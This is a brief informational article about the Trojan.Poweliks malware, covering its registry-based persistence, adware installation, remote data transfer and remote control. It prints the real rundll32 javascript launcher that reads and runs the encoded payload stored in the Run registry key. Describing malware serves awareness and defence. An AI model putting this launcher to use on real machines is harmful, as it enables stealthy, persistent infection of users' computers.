Trojan.Poweliks
Trojan.Poweliks is Trojan virus usually affecting the Windows core systems. It is premeditated to carry out a set of commands once it enters the system. The virus copies itself in the system files to be activated every time the system is rebooted. It usually installs adware and redirects the browser to advertising sites against the will of the user. The payload of the virus is written in an encrypted format in the Windows registry making it difficult to remove. Trojan.Poweliks has the ability to connect to a remote host and transfer gathered data from the infected computer. It will also download an updated version of Trojan and is capable of accepting commands from a remote attacker.
The code used to activate the virus in the system is given below.
rundll32.exejavascript:”\..\mshtml,RunHTMLApplication”;document.write(“\74script language=jscript.encode>”+(new%20ActiveXObject(“WScript.Shell”)).RegRead(“HKCU\\software\\microsoft\\windows\\currentversion\\run\\”)+”\74/script>”)
The virus will create a sub key in the same key in registry values to give a reading error to the user when attempts are made to access it. The biggest challenge from this nasty virus arises from that fact that it infects the registry files of all users on the system. Even new users created on the system will be infected automatically.